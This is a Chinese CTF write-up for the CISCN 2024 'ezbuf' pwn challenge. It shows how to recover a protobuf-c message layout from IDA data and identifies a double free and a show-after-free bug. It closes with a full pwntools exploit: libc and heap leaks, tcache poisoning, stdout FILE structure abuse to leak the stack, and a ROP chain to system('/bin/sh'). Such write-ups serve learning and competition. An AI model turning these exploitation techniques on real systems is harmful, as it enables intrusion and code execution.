文章目录
- 参考
- protobuf
- 逆向学习
- 复原结构
- 思路
- exp
参考
https://www.y4ng.cn/posts/pwn/protobuf/#ciscn-2024-ezbuf
protobuf
当时压根不知道用了protobuf这个玩意,提取工具也没提取出来,还是做题做太少了,很多关键性的结构都没看出来是protobuf
下次可以根据ProtobufCMessageDescriptor结构体的magic头(一般是0x28AAEEF9)来搜索定位到ProtobufCMessageDescriptor
逆向学习
const ProtobufCMessageDescriptor devicemsg__descriptor =
{
PROTOBUF_C__MESSAGE_DESCRIPTOR_MAGIC,
"devicemsg",
"Devicemsg",
"Devicemsg",
"",
sizeof(Devicemsg),
5,
devicemsg__field_descriptors,
devicemsg__field_indices_by_name,
1, devicemsg__number_ranges,
(ProtobufCMessageInit) devicemsg__init,
NULL,NULL,NULL /* reserved[123] */
};
相关字段
/**
* Describes a message.
*/
struct ProtobufCMessageDescriptor {
/** Magic value checked to ensure that the API is used correctly. */
uint32_t magic;
/** The qualified name (e.g., "namespace.Type"). */
const char *name;
/** The unqualified name as given in the .proto file (e.g., "Type"). */
const char *short_name;
/** Identifier used in generated C code. */
const char *c_name;
/** The dot-separated namespace. */
const char *package_name;
/**
* Size in bytes of the C structure representing an instance of this
* type of message.
*/
size_t sizeof_message;
/** Number of elements in `fields`. */
unsigned n_fields;
/** Field descriptors, sorted by tag number. */
const ProtobufCFieldDescriptor *fields;
/** Used for looking up fields by name. */
const unsigned *fields_sorted_by_name;
/** Number of elements in `field_ranges`. */
unsigned n_field_ranges;
/** Used for looking up fields by id. */
const ProtobufCIntRange *field_ranges;
/** Message initialisation function. */
ProtobufCMessageInit message_init;
/** Reserved for future use. */
void *reserved1;
/** Reserved for future use. */
void *reserved2;
/** Reserved for future use. */
void *reserved3;
};
对应IDA中
.data.rel.ro:000000000000BC60 unk_BC60 db 0F9h ; DATA XREF: sub_1AFE+5B↑o
.data.rel.ro:000000000000BC60 ; sub_1B66+17↑o ...
.data.rel.ro:000000000000BC61 db 0EEh
.data.rel.ro:000000000000BC62 db 0AAh
.data.rel.ro:000000000000BC63 db 28h ; (
.data.rel.ro:000000000000BC64 db 0
.data.rel.ro:000000000000BC65 db 0
.data.rel.ro:000000000000BC66 db 0
.data.rel.ro:000000000000BC67 db 0
.data.rel.ro:000000000000BC68 dq offset aHeybro ; "heybro"
.data.rel.ro:000000000000BC70 dq offset aHeybro_0 ; "Heybro"
.data.rel.ro:000000000000BC78 dq offset aHeybro_0 ; "Heybro"
.data.rel.ro:000000000000BC80 dq offset unk_910E
.data.rel.ro:000000000000BC88 db 48h ; H
.data.rel.ro:000000000000BC89 db 0
.data.rel.ro:000000000000BC8A db 0
.data.rel.ro:000000000000BC8B db 0
.data.rel.ro:000000000000BC8C db 0
.data.rel.ro:000000000000BC8D db 0
.data.rel.ro:000000000000BC8E db 0
.data.rel.ro:000000000000BC8F db 0
.data.rel.ro:000000000000BC90 db 5
.data.rel.ro:000000000000BC91 db 0
.data.rel.ro:000000000000BC92 db 0
.data.rel.ro:000000000000BC93 db 0
.data.rel.ro:000000000000BC94 db 0
.data.rel.ro:000000000000BC95 db 0
.data.rel.ro:000000000000BC96 db 0
.data.rel.ro:000000000000BC97 db 0
.data.rel.ro:000000000000BC98 dq offset off_BAE0 ; "whatcon"
.data.rel.ro:000000000000BCA0 dq offset unk_90D0
.data.rel.ro:000000000000BCA8 db 1
.data.rel.ro:000000000000BCA9 db 0
.data.rel.ro:000000000000BCAA db 0
.data.rel.ro:000000000000BCAB db 0
.data.rel.ro:000000000000BCAC db 0
.data.rel.ro:000000000000BCAD db 0
.data.rel.ro:000000000000BCAE db 0
.data.rel.ro:000000000000BCAF db 0
.data.rel.ro:000000000000BCB0 dq offset unk_90F0
.data.rel.ro:000000000000BCB8 dq offset sub_1AFE
然后根据ProtobufCFieldDescriptor去寻找内部各个字段的内容
static const ProtobufCFieldDescriptor devicemsg__field_descriptors[5] =
{
{
"whatcon",
1,
PROTOBUF_C_LABEL_NONE,
PROTOBUF_C_TYPE_BYTES,
0, /* quantifier_offset */
offsetof(Devicemsg, whatcon),
NULL,
NULL,
0, /* flags */
0,NULL,NULL /* reserved1,reserved2, etc */
},
{
"whattodo",
2,
PROTOBUF_C_LABEL_NONE,
PROTOBUF_C_TYPE_SINT64,
0, /* quantifier_offset */
offsetof(Devicemsg, whattodo),
NULL,
NULL,
0, /* flags */
0,NULL,NULL /* reserved1,reserved2, etc */
},
{
"whatidx",
3,
PROTOBUF_C_LABEL_NONE,
PROTOBUF_C_TYPE_SINT64,
0, /* quantifier_offset */
offsetof(Devicemsg, whatidx),
NULL,
NULL,
0, /* flags */
0,NULL,NULL /* reserved1,reserved2, etc */
},
{
"whatsize",
4,
PROTOBUF_C_LABEL_NONE,
PROTOBUF_C_TYPE_SINT64,
0, /* quantifier_offset */
offsetof(Devicemsg, whatsize),
NULL,
NULL,
0, /* flags */
0,NULL,NULL /* reserved1,reserved2, etc */
},
{protobuf_c_message_pack
"whatsthis",
5,
PROTOBUF_C_LABEL_NONE,
PROTOBUF_C_TYPE_UINT32,
0, /* quantifier_offset */
offsetof(Devicemsg, whatsthis),
NULL,
NULL,
0, /* flags */
0,NULL,NULL /* reserved1,reserved2, etc */
},
};
相关字段的定义
struct ProtobufCFieldDescriptor {
/** Name of the field as given in the .proto file. */
const char *name;
/** Tag value of the field as given in the .proto file. */
uint32_t id;
/** Whether the field is `REQUIRED`, `OPTIONAL`, or `REPEATED`. */
ProtobufCLabel label;
/** The type of the field. */
ProtobufCType type;
/**
* The offset in bytes of the message's C structure's quantifier field
* (the `has_MEMBER` field for optional members or the `n_MEMBER` field
* for repeated members or the case enum for oneofs).
*/
unsigned quantifier_offset;
/**
* The offset in bytes into the message's C structure for the member
* itself.
*/
unsigned offset;
/**
* A type-specific descriptor.
*
* If `type` is `PROTOBUF_C_TYPE_ENUM`, then `descriptor` points to the
* corresponding `ProtobufCEnumDescriptor`.
*
* If `type` is `PROTOBUF_C_TYPE_MESSAGE`, then `descriptor` points to
* the corresponding `ProtobufCMessageDescriptor`.
*
* Otherwise this field is NULL.
*/
const void *descriptor; /* for MESSAGE and ENUM types */
/** The default value for this field, if defined. May be NULL. */
const void *default_value;
/**
* A flag word. Zero or more of the bits defined in the
* `ProtobufCFieldFlag` enum may be set.
*/
uint32_t flags;
/** Reserved for future use. */
unsigned reserved_flags;
/** Reserved for future use. */
void *reserved2;
/** Reserved for future use. */
void *reserved3;
};
根据这四个字段来复原原来的结构const char *name; uint32_t id; ProtobufCLabel label; ProtobufCType type;
typedef enum {
/** A well-formed message must have exactly one of this field. */
0 PROTOBUF_C_LABEL_REQUIRED,
/**
* A well-formed message can have zero or one of this field (but not
* more than one).
*/
1 PROTOBUF_C_LABEL_OPTIONAL,
/**
* This field can be repeated any number of times (including zero) in a
* well-formed message. The order of the repeated values will be
* preserved.
*/
2 PROTOBUF_C_LABEL_REPEATED,
/**
* This field has no label. This is valid only in proto3 and is
* equivalent to OPTIONAL but no "has" quantifier will be consulted.
*/
3 PROTOBUF_C_LABEL_NONE,
} ProtobufCLabel;
typedef enum {
0 PROTOBUF_C_TYPE_INT32, /**< int32 */
1 PROTOBUF_C_TYPE_SINT32, /**< signed int32 */
2 PROTOBUF_C_TYPE_SFIXED32, /**< signed int32 (4 bytes) */
3 PROTOBUF_C_TYPE_INT64, /**< int64 */
4 PROTOBUF_C_TYPE_SINT64, /**< signed int64 */
5 PROTOBUF_C_TYPE_SFIXED64, /**< signed int64 (8 bytes) */
6 PROTOBUF_C_TYPE_UINT32, /**< unsigned int32 */
7 PROTOBUF_C_TYPE_FIXED32, /**< unsigned int32 (4 bytes) */
8 PROTOBUF_C_TYPE_UINT64, /**< unsigned int64 */
9 PROTOBUF_C_TYPE_FIXED64, /**< unsigned int64 (8 bytes) */
10 PROTOBUF_C_TYPE_FLOAT, /**< float */
11 PROTOBUF_C_TYPE_DOUBLE, /**< double */
12 PROTOBUF_C_TYPE_BOOL, /**< boolean */
13 PROTOBUF_C_TYPE_ENUM, /**< enumerated type */
14 PROTOBUF_C_TYPE_STRING, /**< UTF-8 or ASCII string */
15 PROTOBUF_C_TYPE_BYTES, /**< arbitrary byte sequence */
16 PROTOBUF_C_TYPE_MESSAGE, /**< nested message */
} ProtobufCType;
对应到IDA中
.data.rel.ro:000000000000BAE0 off_BAE0 dq offset aWhatcon ; DATA XREF: .data.rel.ro:000000000000BC98↓o
.data.rel.ro:000000000000BAE0 ; "whatcon"
.data.rel.ro:000000000000BAE8 db 1
.data.rel.ro:000000000000BAE9 db 0
.data.rel.ro:000000000000BAEA db 0
.data.rel.ro:000000000000BAEB db 0
.data.rel.ro:000000000000BAEC db 3
.data.rel.ro:000000000000BAED db 0
.data.rel.ro:000000000000BAEE db 0
.data.rel.ro:000000000000BAEF db 0
.data.rel.ro:000000000000BAF0 db 0Fh
.data.rel.ro:000000000000BAF1 db 0
.data.rel.ro:000000000000BAF2 db 0
.data.rel.ro:000000000000BAF3 db 0
.data.rel.ro:000000000000BAF4 db 0
.data.rel.ro:000000000000BAF5 db 0
.data.rel.ro:000000000000BAF6 db 0
.data.rel.ro:000000000000BAF7 db 0
.data.rel.ro:000000000000BAF8 db 18h
.data.rel.ro:000000000000BAF9 db 0
.data.rel.ro:000000000000BAFA db 0
.data.rel.ro:000000000000BAFB db 0
.data.rel.ro:000000000000BAFC db 0
.data.rel.ro:000000000000BAFD db 0
.data.rel.ro:000000000000BAFE db 0
.data.rel.ro:000000000000BAFF db 0
.data.rel.ro:000000000000BB00 db 0
.data.rel.ro:000000000000BB01 db 0
.data.rel.ro:000000000000BB02 db 0
.data.rel.ro:000000000000BB03 db 0
.data.rel.ro:000000000000BB04 db 0
.data.rel.ro:000000000000BB05 db 0
.data.rel.ro:000000000000BB06 db 0
.data.rel.ro:000000000000BB07 db 0
.data.rel.ro:000000000000BB08 db 0
.data.rel.ro:000000000000BB09 db 0
.data.rel.ro:000000000000BB0A db 0
.data.rel.ro:000000000000BB0B db 0
.data.rel.ro:000000000000BB0C db 0
.data.rel.ro:000000000000BB0D db 0
.data.rel.ro:000000000000BB0E db 0
.data.rel.ro:000000000000BB0F db 0
.data.rel.ro:000000000000BB10 db 0
.data.rel.ro:000000000000BB11 db 0
.data.rel.ro:000000000000BB12 db 0
.data.rel.ro:000000000000BB13 db 0
.data.rel.ro:000000000000BB14 db 0
.data.rel.ro:000000000000BB15 db 0
.data.rel.ro:000000000000BB16 db 0
.data.rel.ro:000000000000BB17 db 0
.data.rel.ro:000000000000BB18 db 0
.data.rel.ro:000000000000BB19 db 0
.data.rel.ro:000000000000BB1A db 0
.data.rel.ro:000000000000BB1B db 0
.data.rel.ro:000000000000BB1C db 0
.data.rel.ro:000000000000BB1D db 0
.data.rel.ro:000000000000BB1E db 0
.data.rel.ro:000000000000BB1F db 0
.data.rel.ro:000000000000BB20 db 0
.data.rel.ro:000000000000BB21 db 0
.data.rel.ro:000000000000BB22 db 0
.data.rel.ro:000000000000BB23 db 0
.data.rel.ro:000000000000BB24 db 0
.data.rel.ro:000000000000BB25 db 0
.data.rel.ro:000000000000BB26 db 0
.data.rel.ro:000000000000BB27 db 0
.data.rel.ro:000000000000BB28 dq offset aWhattodo ; "whattodo"
.data.rel.ro:000000000000BB30 db 2
.data.rel.ro:000000000000BB31 db 0
.data.rel.ro:000000000000BB32 db 0
.data.rel.ro:000000000000BB33 db 0
.data.rel.ro:000000000000BB34 db 3
.data.rel.ro:000000000000BB35 db 0
.data.rel.ro:000000000000BB36 db 0
.data.rel.ro:000000000000BB37 db 0
.data.rel.ro:000000000000BB38 db 4
.data.rel.ro:000000000000BB39 db 0
.data.rel.ro:000000000000BB3A db 0
.data.rel.ro:000000000000BB3B db 0
.data.rel.ro:000000000000BB3C db 0
.data.rel.ro:000000000000BB3D db 0
.data.rel.ro:000000000000BB3E db 0
.data.rel.ro:000000000000BB3F db 0
.data.rel.ro:000000000000BB40 db 28h ; (
.data.rel.ro:000000000000BB41 db 0
.data.rel.ro:000000000000BB42 db 0
.data.rel.ro:000000000000BB43 db 0
.data.rel.ro:000000000000BB44 db 0
.data.rel.ro:000000000000BB45 db 0
.data.rel.ro:000000000000BB46 db 0
.data.rel.ro:000000000000BB47 db 0
.data.rel.ro:000000000000BB48 db 0
.data.rel.ro:000000000000BB49 db 0
.data.rel.ro:000000000000BB4A db 0
.data.rel.ro:000000000000BB4B db 0
.data.rel.ro:000000000000BB4C db 0
.data.rel.ro:000000000000BB4D db 0
.data.rel.ro:000000000000BB4E db 0
.data.rel.ro:000000000000BB4F db 0
.data.rel.ro:000000000000BB50 db 0
.data.rel.ro:000000000000BB51 db 0
.data.rel.ro:000000000000BB52 db 0
.data.rel.ro:000000000000BB53 db 0
.data.rel.ro:000000000000BB54 db 0
.data.rel.ro:000000000000BB55 db 0
.data.rel.ro:000000000000BB56 db 0
.data.rel.ro:000000000000BB57 db 0
.data.rel.ro:000000000000BB58 db 0
.data.rel.ro:000000000000BB59 db 0
.data.rel.ro:000000000000BB5A db 0
.data.rel.ro:000000000000BB5B db 0
.data.rel.ro:000000000000BB5C db 0
.data.rel.ro:000000000000BB5D db 0
.data.rel.ro:000000000000BB5E db 0
.data.rel.ro:000000000000BB5F db 0
.data.rel.ro:000000000000BB60 db 0
.data.rel.ro:000000000000BB61 db 0
.data.rel.ro:000000000000BB62 db 0
.data.rel.ro:000000000000BB63 db 0
.data.rel.ro:000000000000BB64 db 0
.data.rel.ro:000000000000BB65 db 0
.data.rel.ro:000000000000BB66 db 0
.data.rel.ro:000000000000BB67 db 0
.data.rel.ro:000000000000BB68 db 0
.data.rel.ro:000000000000BB69 db 0
.data.rel.ro:000000000000BB6A db 0
.data.rel.ro:000000000000BB6B db 0
.data.rel.ro:000000000000BB6C db 0
.data.rel.ro:000000000000BB6D db 0
.data.rel.ro:000000000000BB6E db 0
.data.rel.ro:000000000000BB6F db 0
.data.rel.ro:000000000000BB70 dq offset aWhatidx ; "whatidx"
.data.rel.ro:000000000000BB78 db 3
.data.rel.ro:000000000000BB79 db 0
.data.rel.ro:000000000000BB7A db 0
.data.rel.ro:000000000000BB7B db 0
.data.rel.ro:000000000000BB7C db 3
.data.rel.ro:000000000000BB7D db 0
.data.rel.ro:000000000000BB7E db 0
.data.rel.ro:000000000000BB7F db 0
.data.rel.ro:000000000000BB80 db 4
.data.rel.ro:000000000000BB81 db 0
.data.rel.ro:000000000000BB82 db 0
.data.rel.ro:000000000000BB83 db 0
.data.rel.ro:000000000000BB84 db 0
.data.rel.ro:000000000000BB85 db 0
.data.rel.ro:000000000000BB86 db 0
.data.rel.ro:000000000000BB87 db 0
.data.rel.ro:000000000000BB88 db 30h ; 0
.data.rel.ro:000000000000BB89 db 0
.data.rel.ro:000000000000BB8A db 0
.data.rel.ro:000000000000BB8B db 0
.data.rel.ro:000000000000BB8C db 0
.data.rel.ro:000000000000BB8D db 0
.data.rel.ro:000000000000BB8E db 0
.data.rel.ro:000000000000BB8F db 0
.data.rel.ro:000000000000BB90 db 0
.data.rel.ro:000000000000BB91 db 0
.data.rel.ro:000000000000BB92 db 0
.data.rel.ro:000000000000BB93 db 0
.data.rel.ro:000000000000BB94 db 0
.data.rel.ro:000000000000BB95 db 0
.data.rel.ro:000000000000BB96 db 0
.data.rel.ro:000000000000BB97 db 0
.data.rel.ro:000000000000BB98 db 0
.data.rel.ro:000000000000BB99 db 0
.data.rel.ro:000000000000BB9A db 0
.data.rel.ro:000000000000BB9B db 0
.data.rel.ro:000000000000BB9C db 0
.data.rel.ro:000000000000BB9D db 0
.data.rel.ro:000000000000BB9E db 0
.data.rel.ro:000000000000BB9F db 0
.data.rel.ro:000000000000BBA0 db 0
.data.rel.ro:000000000000BBA1 db 0
.data.rel.ro:000000000000BBA2 db 0
.data.rel.ro:000000000000BBA3 db 0
.data.rel.ro:000000000000BBA4 db 0
.data.rel.ro:000000000000BBA5 db 0
.data.rel.ro:000000000000BBA6 db 0
.data.rel.ro:000000000000BBA7 db 0
.data.rel.ro:000000000000BBA8 db 0
.data.rel.ro:000000000000BBA9 db 0
.data.rel.ro:000000000000BBAA db 0
.data.rel.ro:000000000000BBAB db 0
.data.rel.ro:000000000000BBAC db 0
.data.rel.ro:000000000000BBAD db 0
.data.rel.ro:000000000000BBAE db 0
.data.rel.ro:000000000000BBAF db 0
.data.rel.ro:000000000000BBB0 db 0
.data.rel.ro:000000000000BBB1 db 0
.data.rel.ro:000000000000BBB2 db 0
.data.rel.ro:000000000000BBB3 db 0
.data.rel.ro:000000000000BBB4 db 0
.data.rel.ro:000000000000BBB5 db 0
.data.rel.ro:000000000000BBB6 db 0
.data.rel.ro:000000000000BBB7 db 0
.data.rel.ro:000000000000BBB8 dq offset aWhatsize ; "whatsize"
.data.rel.ro:000000000000BBC0 db 4
.data.rel.ro:000000000000BBC1 db 0
.data.rel.ro:000000000000BBC2 db 0
.data.rel.ro:000000000000BBC3 db 0
.data.rel.ro:000000000000BBC4 db 3
.data.rel.ro:000000000000BBC5 db 0
.data.rel.ro:000000000000BBC6 db 0
.data.rel.ro:000000000000BBC7 db 0
.data.rel.ro:000000000000BBC8 db 4
.data.rel.ro:000000000000BBC9 db 0
.data.rel.ro:000000000000BBCA db 0
.data.rel.ro:000000000000BBCB db 0
.data.rel.ro:000000000000BBCC db 0
.data.rel.ro:000000000000BBCD db 0
.data.rel.ro:000000000000BBCE db 0
.data.rel.ro:000000000000BBCF db 0
.data.rel.ro:000000000000BBD0 db 38h ; 8
.data.rel.ro:000000000000BBD1 db 0
.data.rel.ro:000000000000BBD2 db 0
.data.rel.ro:000000000000BBD3 db 0
.data.rel.ro:000000000000BBD4 db 0
.data.rel.ro:000000000000BBD5 db 0
.data.rel.ro:000000000000BBD6 db 0
.data.rel.ro:000000000000BBD7 db 0
.data.rel.ro:000000000000BBD8 db 0
.data.rel.ro:000000000000BBD9 db 0
.data.rel.ro:000000000000BBDA db 0
.data.rel.ro:000000000000BBDB db 0
.data.rel.ro:000000000000BBDC db 0
.data.rel.ro:000000000000BBDD db 0
.data.rel.ro:000000000000BBDE db 0
.data.rel.ro:000000000000BBDF db 0
.data.rel.ro:000000000000BBE0 db 0
.data.rel.ro:000000000000BBE1 db 0
.data.rel.ro:000000000000BBE2 db 0
.data.rel.ro:000000000000BBE3 db 0
.data.rel.ro:000000000000BBE4 db 0
.data.rel.ro:000000000000BBE5 db 0
.data.rel.ro:000000000000BBE6 db 0
.data.rel.ro:000000000000BBE7 db 0
.data.rel.ro:000000000000BBE8 db 0
.data.rel.ro:000000000000BBE9 db 0
.data.rel.ro:000000000000BBEA db 0
.data.rel.ro:000000000000BBEB db 0
.data.rel.ro:000000000000BBEC db 0
.data.rel.ro:000000000000BBED db 0
.data.rel.ro:000000000000BBEE db 0
.data.rel.ro:000000000000BBEF db 0
.data.rel.ro:000000000000BBF0 db 0
.data.rel.ro:000000000000BBF1 db 0
.data.rel.ro:000000000000BBF2 db 0
.data.rel.ro:000000000000BBF3 db 0
.data.rel.ro:000000000000BBF4 db 0
.data.rel.ro:000000000000BBF5 db 0
.data.rel.ro:000000000000BBF6 db 0
.data.rel.ro:000000000000BBF7 db 0
.data.rel.ro:000000000000BBF8 db 0
.data.rel.ro:000000000000BBF9 db 0
.data.rel.ro:000000000000BBFA db 0
.data.rel.ro:000000000000BBFB db 0
.data.rel.ro:000000000000BBFC db 0
.data.rel.ro:000000000000BBFD db 0
.data.rel.ro:000000000000BBFE db 0
.data.rel.ro:000000000000BBFF db 0
.data.rel.ro:000000000000BC00 dq offset aWhatsthis ; "whatsthis"
.data.rel.ro:000000000000BC08 db 5
.data.rel.ro:000000000000BC09 db 0
.data.rel.ro:000000000000BC0A db 0
.data.rel.ro:000000000000BC0B db 0
.data.rel.ro:000000000000BC0C db 3
.data.rel.ro:000000000000BC0D db 0
.data.rel.ro:000000000000BC0E db 0
.data.rel.ro:000000000000BC0F db 0
.data.rel.ro:000000000000BC10 db 6
.data.rel.ro:000000000000BC11 db 0
.data.rel.ro:000000000000BC12 db 0
.data.rel.ro:000000000000BC13 db 0
.data.rel.ro:000000000000BC14 db 0
.data.rel.ro:000000000000BC15 db 0
.data.rel.ro:000000000000BC16 db 0
.data.rel.ro:000000000000BC17 db 0
.data.rel.ro:000000000000BC18 db 40h ; @
.data.rel.ro:000000000000BC19 db 0
.data.rel.ro:000000000000BC1A db 0
.data.rel.ro:000000000000BC1B db 0
.data.rel.ro:000000000000BC1C db 0
.data.rel.ro:000000000000BC1D db 0
.data.rel.ro:000000000000BC1E db 0
.data.rel.ro:000000000000BC1F db 0
.data.rel.ro:000000000000BC20 db 0
.data.rel.ro:000000000000BC21 db 0
.data.rel.ro:000000000000BC22 db 0
.data.rel.ro:000000000000BC23 db 0
.data.rel.ro:000000000000BC24 db 0
.data.rel.ro:000000000000BC25 db 0
.data.rel.ro:000000000000BC26 db 0
.data.rel.ro:000000000000BC27 db 0
.data.rel.ro:000000000000BC28 db 0
.data.rel.ro:000000000000BC29 db 0
.data.rel.ro:000000000000BC2A db 0
.data.rel.ro:000000000000BC2B db 0
.data.rel.ro:000000000000BC2C db 0
.data.rel.ro:000000000000BC2D db 0
.data.rel.ro:000000000000BC2E db 0
.data.rel.ro:000000000000BC2F db 0
.data.rel.ro:000000000000BC30 db 0
.data.rel.ro:000000000000BC31 db 0
.data.rel.ro:000000000000BC32 db 0
.data.rel.ro:000000000000BC33 db 0
.data.rel.ro:000000000000BC34 db 0
.data.rel.ro:000000000000BC35 db 0
.data.rel.ro:000000000000BC36 db 0
.data.rel.ro:000000000000BC37 db 0
.data.rel.ro:000000000000BC38 db 0
.data.rel.ro:000000000000BC39 db 0
.data.rel.ro:000000000000BC3A db 0
.data.rel.ro:000000000000BC3B db 0
.data.rel.ro:000000000000BC3C db 0
.data.rel.ro:000000000000BC3D db 0
.data.rel.ro:000000000000BC3E db 0
.data.rel.ro:000000000000BC3F db 0
.data.rel.ro:000000000000BC40 db 0
.data.rel.ro:000000000000BC41 db 0
.data.rel.ro:000000000000BC42 db 0
.data.rel.ro:000000000000BC43 db 0
.data.rel.ro:000000000000BC44 db 0
.data.rel.ro:000000000000BC45 db 0
.data.rel.ro:000000000000BC46 db 0
.data.rel.ro:000000000000BC47 db 0
.data.rel.ro:000000000000BC48 db 0
.data.rel.ro:000000000000BC49 db 0
.data.rel.ro:000000000000BC4A db 0
.data.rel.ro:000000000000BC4B db 0
.data.rel.ro:000000000000BC4C db 0
.data.rel.ro:000000000000BC4D db 0
.data.rel.ro:000000000000BC4E db 0
.data.rel.ro:000000000000BC4F db 0
.data.rel.ro:000000000000BC50 db 0
.data.rel.ro:000000000000BC51 db 0
.data.rel.ro:000000000000BC52 db 0
.data.rel.ro:000000000000BC53 db 0
.data.rel.ro:000000000000BC54 db 0
.data.rel.ro:000000000000BC55 db 0
.data.rel.ro:000000000000BC56 db 0
.data.rel.ro:000000000000BC57 db 0
.data.rel.ro:000000000000BC58 db 0
.data.rel.ro:000000000000BC59 db 0
.data.rel.ro:000000000000BC5A db 0
.data.rel.ro:000000000000BC5B db 0
.data.rel.ro:000000000000BC5C db 0
.data.rel.ro:000000000000BC5D db 0
.data.rel.ro:000000000000BC5E db 0
.data.rel.ro:000000000000BC5F db 0
复原结构
根据ProtobufCMessageDescriptor 的name字段得到这个message的名字为heybro,然后根据ProtobufCFieldDescriptor 的const char *name; uint32_t id; ProtobufCLabel label; ProtobufCType type;得到各个内容的名字,id,label和类型
message heybro{
bytes whatcon = 1;
sint64 whattodo = 2;
sint64 whatidx = 3;
sint64 whatsize = 4;
uint32 whatsthis = 5;
}
struct Heybro
{
ProtobufCMessage base; //24个字节
ProtobufCBinaryData whatcon;
int64_t whattodo;
int64_t whatidx;
int64_t whatsize;
uint32_t whatsthis;
};
struct ProtobufCMessage {
/** The descriptor for this message type. */
const ProtobufCMessageDescriptor *descriptor;
/** The number of elements in `unknown_fields`. */
unsigned n_unknown_fields;
/** The fields that weren't recognized by the parser. */
ProtobufCMessageUnknownField *unknown_fields;
};
struct ProtobufCBinaryData {
size_t len; /**< Number of bytes in the `data` field. */
uint8_t *data; /**< Data bytes. */
};
sub_1934(
*(_QWORD *)(heybro + 24),
*(_QWORD *)(heybro + 32),
*(_QWORD *)(heybro + 40),
*(_QWORD *)(heybro + 48),
*(_QWORD *)(heybro + 56),
*(unsigned int *)(heybro + 64));
bytes类型,转化为c语言结构时会变成一个结构体,里面存放长度和内容指针。IDA由于没有内置相关结构信息,将其当做八字节数组进行解析,因此会产生一个有6个记录的错觉,实际上后两个参数是同一个记录内置的两条记录。
思路
add会检查索引,然后根据索引分配会固定得到0x40大小的chunk,并且会把whatcon的内容赋值过去,10次delete,会检查索引范围,和对应索引的chunk是否为空,但free后没有清零,3次show。会在会检查索引范围,和对应索引的chunk是否为空,并且在whatsthis == '\xFF’和 whatsize == 48都不满足会打印出chunk的内容
存在doublefree,show after free
- add时候会先分配一个0x50和一个和data长度相同的chunk,这两个都是从unsortedbin中分的,然后先是将内容写到那个和data长度相同的chunk, 最后memcpy将datachunk写到分配得到的0x40的chunk,这里的话可以通过残留的libc泄露地址
- 泄露堆地址,直接 由于mempy特性和必须写入内容特性,残留堆地址会被修改,所以没用,通过free到tcache泄露即可
- 构造任意写,但由于delete的限制次数刚好是10次,所以只有一次任意写,但此时tcache中存在其他bin有很多个,可以通过写tcachebin然后实现多次任意写,泄露stack地址可以通过任意写stdout后泄露栈地址
IO_2_1_stdout:_flags = 0xFBAD1800,然后让后面的三个read参数为0,然后就write_base和write_ptr之间为我们要输出的地址范围
- malloc分配到tcachebin,然后再修改tcachebin,使得可以分配到栈上
exp
from pwn import *
import devicemsg_pb2
#context.log_level='debug'
context.arch='amd64'
context.os='linux'
def add(idx,con):
bro=devicemsg_pb2.heybro()
bro.whatcon=con
bro.whattodo=1
bro.whatidx=idx
p.sendafter(b'WHAT DO YOU WANT?\n',bro.SerializeToString())
def delete(idx):
bro=devicemsg_pb2.heybro()
bro.whattodo=2
bro.whatidx=idx
p.sendafter(b'WHAT DO YOU WANT?\n',bro.SerializeToString())
def magic(idx,thiss,size,con):
bro=devicemsg_pb2.heybro()
bro.whattodo=3
bro.whatidx=idx
bro.whatsthis=thiss
bro.whatsize=size
bro.whatcon=con
p.sendafter(b'WHAT DO YOU WANT?\n',bro.SerializeToString())
def exitt():
bro=devicemsg_pb2.heybro()
bro.whattodo=4
p.sendafter(b'WHAT DO YOU WANT?\n',bro.SerializeToString())
#p=remote('8.147.129.121',15268)
p=process('./pwn')
libc=ELF('./libc.so.6')
add(0,b'a')
add(1,b'a')
magic(0,0,0,b'')
p.recvuntil(b'Content:')
libcbase=u64(p.recvuntil(b'\x7f').ljust(8,b'\x00'))-0x21ac61
print(hex(libcbase))
for i in range(9):
add(i,b'a')
for i in range(8):
delete(i)
magic(0,0,0,b'')
p.recvuntil(b'Content:')
heap=u64(p.recvline()[:-1].ljust(8,b'\x00'))+1
print(hex(heap))
delete(8)
delete(7)
for i in range(7):
add(i,b'a')
pause()
add(7,p64(((heap<<12)-0x5000+0xe0)^heap))
add(7,b'a')
add(7,b'a')
add(7,b'\x00'*8+p64(libcbase+0x21b780-0x90)+p64(0)+p64(((heap<<12)-0x5000+0xe0)))
payload=b'\x00'*0x90+p64(0xfbad1887)+p64(0)*3+p64(libcbase+0x222200)+p64(libcbase+0x222208) #写stderr
add(7,payload)
stack=u64(p.recvuntil(b'\x7f').ljust(8,b'\x00'))
add(7,p64(0)+p64(stack-0x168)+b'\x00'*0xd0)# 再次修改tcachebin
#gdb.attach(p)
rdi=libcbase+0x2a3e5
bin_sh=libcbase+next(libc.search(b'/bin/sh\x00'))
system=libcbase+libc.symbols['system']
ret=libcbase+0x29139
rop=b'a'*8+p64(ret)+p64(rdi)+p64(bin_sh)+p64(system)
add(7,rop.ljust(0xc0,b'\x00'))
p.interactive()
